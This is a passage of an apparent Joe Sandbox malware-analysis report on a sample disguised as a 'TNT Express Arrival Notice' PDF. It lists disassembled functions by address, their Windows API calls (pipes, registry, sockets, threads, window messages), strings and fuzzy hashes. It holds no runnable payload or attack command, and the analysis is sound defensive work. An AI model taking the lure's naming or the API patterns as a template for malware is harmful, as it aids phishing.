StringFromGUID2.OLE32(?,?,00000028), ref: 009278AF
SysAllocString.OLEAUT32(?), ref: 009278BD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 264327a015937d2497cbfdd764cee776763aef1ff203865fccc7fb9aea192071
Instruction ID: 7046cc80060f95d699f892b2dd272f91256c750fa436843a27933224b057d9ec
Opcode Fuzzy Hash: 264327a015937d2497cbfdd764cee776763aef1ff203865fccc7fb9aea192071
Instruction Fuzzy Hash: CA21A171608224BFDB109FE9ECC8DBAB7ECEB083607108125FA15DB2A5E674DC41DB64

Function 009304D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009304F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0093052E

Strings

nul, xrefs: 00930567

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d76e97c1bfd46af9b7d612e7134c56bcebde715dd5f1d8d6bd50317d765db781
Instruction ID: 92a2c19f6868f32005c148ea8ef9c2520db119e01ed1134f69de004b47c48860
Opcode Fuzzy Hash: d76e97c1bfd46af9b7d612e7134c56bcebde715dd5f1d8d6bd50317d765db781
Instruction Fuzzy Hash: EE217CB5500305AFDF209F2ADC54A9A7BB8BF84724F204A19F8A1D72E0E770D940DF20

Function 009305A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009305C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00930601

Strings

nul, xrefs: 00930639

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: d73a6ea3ae14b3ef7ede40cd0911af5da1802e5965d2c7bfd4fa9989902856ab
Instruction ID: 42e6fe043e5f3efb2e2f70c5358d2363859670497086a8339b53b29f084c9548
Opcode Fuzzy Hash: d73a6ea3ae14b3ef7ede40cd0911af5da1802e5965d2c7bfd4fa9989902856ab
Instruction Fuzzy Hash: C1217F755003059FDB209F699C15A9A77A8AFD5B28F200B19F8A1E72E4D7709860CF10

Function 009540AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008C604C
Part of subcall function 008C600E: GetStockObject.GDI32(00000011), ref: 008C6060
Part of subcall function 008C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008C606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00954112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0095411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0095412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00954139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00954145

Strings

Msctls_Progress32, xrefs: 009540E3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 519bb201de920c18fae5ddfcfdab23e5f1c1391f1116a078272099fe960932b7
Instruction ID: 2ab76ba5c885e14ec53c3c864ff4ee13a6e60b63b56871266efb786daca49240
Opcode Fuzzy Hash: 519bb201de920c18fae5ddfcfdab23e5f1c1391f1116a078272099fe960932b7
Instruction Fuzzy Hash: F411B2B215021ABEEF119F65CC85EE77FADEF18798F104111BA18A2190C672DC61DBA4

Function 008FD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008FD7A3: _free.LIBCMT ref: 008FD7CC

_free.LIBCMT ref: 008FD82D

Part of subcall function 008F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000), ref: 008F29DE
Part of subcall function 008F29C8: GetLastError.KERNEL32(00000000,?,008FD7D1,00000000,00000000,00000000,00000000,?,008FD7F8,00000000,00000007,00000000,?,008FDBF5,00000000,00000000), ref: 008F29F0

_free.LIBCMT ref: 008FD838
_free.LIBCMT ref: 008FD843
_free.LIBCMT ref: 008FD897
_free.LIBCMT ref: 008FD8A2
_free.LIBCMT ref: 008FD8AD
_free.LIBCMT ref: 008FD8B8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: d2dbc47453b7ae324273155cb7684e4f08ea1dde12822907ec5547c1b39b97c4
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: A8112E71680B0CAAD621BFB4CC47FEB7BDDFF04700F404825B399EA4A2DA65B5058662

Function 0092DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0092DA74
LoadStringW.USER32(00000000), ref: 0092DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0092DA91
LoadStringW.USER32(00000000), ref: 0092DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0092DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0092DAB9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: ae703ef5630cb3954123d00e9679c963d5dd911464d8edfdd8213bfde8d6ed72
Instruction ID: a97a048633cdb9b14a0771e2da4ba54bc3132ad762448343094911f1e49d1701
Opcode Fuzzy Hash: ae703ef5630cb3954123d00e9679c963d5dd911464d8edfdd8213bfde8d6ed72
Instruction Fuzzy Hash: 040186F25043187FE710EBA1DD89EEB336CE708306F404891B746E2041EA749E848F74

Function 0093096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00EAF460,00EAF460), ref: 0093097B
EnterCriticalSection.KERNEL32(00EAF440,00000000), ref: 0093098D
TerminateThread.KERNEL32(00410044,000001F6), ref: 0093099B
WaitForSingleObject.KERNEL32(00410044,000003E8), ref: 009309A9
CloseHandle.KERNEL32(00410044), ref: 009309B8
InterlockedExchange.KERNEL32(00EAF460,000001F6), ref: 009309C8
LeaveCriticalSection.KERNEL32(00EAF440), ref: 009309CF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 197a6ea8e4015482d5f87e5b947863249121d17066589241a27da5a695f282bc
Instruction ID: aaeec6888a63ee808a808c2c08bd6cfc9687dc376e8cde308d4d1e6c5f11ceb1
Opcode Fuzzy Hash: 197a6ea8e4015482d5f87e5b947863249121d17066589241a27da5a695f282bc
Instruction Fuzzy Hash: AEF0197245AB02AFD7415BA5EE88BDABA29FF41702F402025F202908A0CB7494A5DF90

Function 00941C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00941DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00941DE1
WSAGetLastError.WSOCK32 ref: 00941DF2
htons.WSOCK32(?,?,?,?,?), ref: 00941EDB
inet_ntoa.WSOCK32(?), ref: 00941E8C

Part of subcall function 009239E8: _strlen.LIBCMT ref: 009239F2

Part of subcall function 00943224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0093EC0C), ref: 00943240

_strlen.LIBCMT ref: 00941F35

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 1ef90b73936b96bc8d991af34fec2445a83427be7e2e05508dbb709fb95555cc
Instruction ID: de2c432db361b7edfc35fbb043c1e19e3a345b219b18fd1900557ef84d4ce016
Opcode Fuzzy Hash: 1ef90b73936b96bc8d991af34fec2445a83427be7e2e05508dbb709fb95555cc
Instruction Fuzzy Hash: 99B1A171604340AFC324DF24C885F2A7BA9EF84318F54895CF4569B2E2DB71ED86CB92

Function 008C5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 008C5D30
GetWindowRect.USER32(?,?), ref: 008C5D71
ScreenToClient.USER32(?,?), ref: 008C5D99
GetClientRect.USER32(?,?), ref: 008C5ED7
GetWindowRect.USER32(?,?), ref: 008C5EF8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 1a797a37bdc4461ecb51e9082b1a7064d9a8560baf2d41baf711d24d9ff3756d
Instruction ID: f950a9fa127b7c42b6d1b4d0d5e5b728bd17e885650a72b6753926fe60f40e07
Opcode Fuzzy Hash: 1a797a37bdc4461ecb51e9082b1a7064d9a8560baf2d41baf711d24d9ff3756d
Instruction Fuzzy Hash: 11B14675A0074ADFDB14CFA9C480BEAB7B5FF48310F14841AE9A9D7290DB30EA91DB50

Function 008F01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 008F00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F00D6
__allrem.LIBCMT ref: 008F00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F010B
__allrem.LIBCMT ref: 008F0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F0140

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: e91f8bfcc515e17792653a7bbe998432b8b34aa36f4a48a961cceff4ff971278
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: EF81B472A00B0A9FE724AB79CC41B7A73E9FF91724F24452AF651D6282EF70D9408B51

Function 008F61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008E82D9,008E82D9,?,?,?,008F644F,00000001,00000001,8BE85006), ref: 008F6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008F644F,00000001,00000001,8BE85006,?,?,?), ref: 008F62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008F63D8
__freea.LIBCMT ref: 008F63E5

Part of subcall function 008F3820: RtlAllocateHeap.NTDLL(00000000,?,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6,?,008C1129), ref: 008F3852

__freea.LIBCMT ref: 008F63EE
__freea.LIBCMT ref: 008F6413

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: cf8ff5e412ef17b3f494fc1f12c722ccc43f9bde1b2836b286f0ee58f81d5840
Instruction ID: 6384d39c8bd37b9a10f387c6fd804dcc32ed2ee8ab7df3f7e764fc7ad391eec6
Opcode Fuzzy Hash: cf8ff5e412ef17b3f494fc1f12c722ccc43f9bde1b2836b286f0ee58f81d5840
Instruction Fuzzy Hash: 9951EE72A0021AABEB258F74CC81EBF77AAFB54750F154329FA05D6240EB34DC64D6A1

Function 0094BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

Part of subcall function 0094C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0094B6AE,?,?), ref: 0094C9B5
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094C9F1
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA68
Part of subcall function 0094C998: _wcslen.LIBCMT ref: 0094CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0094BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0094BD25
RegCloseKey.ADVAPI32(00000000), ref: 0094BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0094BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0094BDF3
RegCloseKey.ADVAPI32(?), ref: 0094BDFF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 47a8c6fc95735b5db82250cc0262397230edb4bf906b6459abde4d6ec34193b2
Instruction ID: 18118ba3b5c29b7c10f78067c40333e78d128bd080b031c1ab03fe85cf9a0096
Opcode Fuzzy Hash: 47a8c6fc95735b5db82250cc0262397230edb4bf906b6459abde4d6ec34193b2
Instruction Fuzzy Hash: C6817E70508241AFD714DF24C895E2ABBF9FF84308F14899CF5998B2A2DB31ED45CB92

Function 0091F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0091F7B9
SysAllocString.OLEAUT32(00000001), ref: 0091F860
VariantCopy.OLEAUT32(0091FA64,00000000), ref: 0091F889
VariantClear.OLEAUT32(0091FA64), ref: 0091F8AD
VariantCopy.OLEAUT32(0091FA64,00000000), ref: 0091F8B1
VariantClear.OLEAUT32(?), ref: 0091F8BB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: c94a424ed93333c8f29db6b7170c4763273b3898e3cc1f11c086c9a554d4c4ec
Instruction ID: eab3a8e4e8dff0e5a4b5883dc3eee44475527d7d862d32f3a245246ca8ddd0d7
Opcode Fuzzy Hash: c94a424ed93333c8f29db6b7170c4763273b3898e3cc1f11c086c9a554d4c4ec
Instruction Fuzzy Hash: BD51D73570031CBBCF14AF65D8A5BA9B3A9EF45310F1444A7E906DF291D7748C80DB96

Function 0093910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 008C7620: _wcslen.LIBCMT ref: 008C7625

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009394E5
_wcslen.LIBCMT ref: 00939506
_wcslen.LIBCMT ref: 0093952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00939585

Strings

X, xrefs: 00939412

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: b1982f753ec82991878e2652fcf0360b7b1ef02c5ca21201f1a435729aa89746
Instruction ID: aeb5d1a108648bbe5cd7c3a69370ead771a01bbb108be9e79686e1879d24fd2d
Opcode Fuzzy Hash: b1982f753ec82991878e2652fcf0360b7b1ef02c5ca21201f1a435729aa89746
Instruction Fuzzy Hash: 42E159716083409FC724EF28C885B6AB7E4FF85314F04896DF8999B2A2DB71DD45CB92

Function 008D920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

BeginPaint.USER32(?,?,?), ref: 008D9241
GetWindowRect.USER32(?,?), ref: 008D92A5
ScreenToClient.USER32(?,?), ref: 008D92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008D92D3
EndPaint.USER32(?,?,?,?,?), ref: 008D9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009171EA

Part of subcall function 008D9339: BeginPath.GDI32(00000000), ref: 008D9357

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 3dbec4252323c6c08f3b5903d2e8a87c18f532b1c63b00e3acc9840424518ffe
Instruction ID: d4e8916c587511b7d08347fecba6703886df2a35f4e13189343d22f44d0f498d
Opcode Fuzzy Hash: 3dbec4252323c6c08f3b5903d2e8a87c18f532b1c63b00e3acc9840424518ffe
Instruction Fuzzy Hash: 0841DE70208306AFD711DF69DC84FBA7BB8FB45365F04062AF9A4C72A1C7309845EB62

Function 009307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0093080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00930847
EnterCriticalSection.KERNEL32(?), ref: 00930863
LeaveCriticalSection.KERNEL32(?), ref: 009308DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009308F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00930921

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
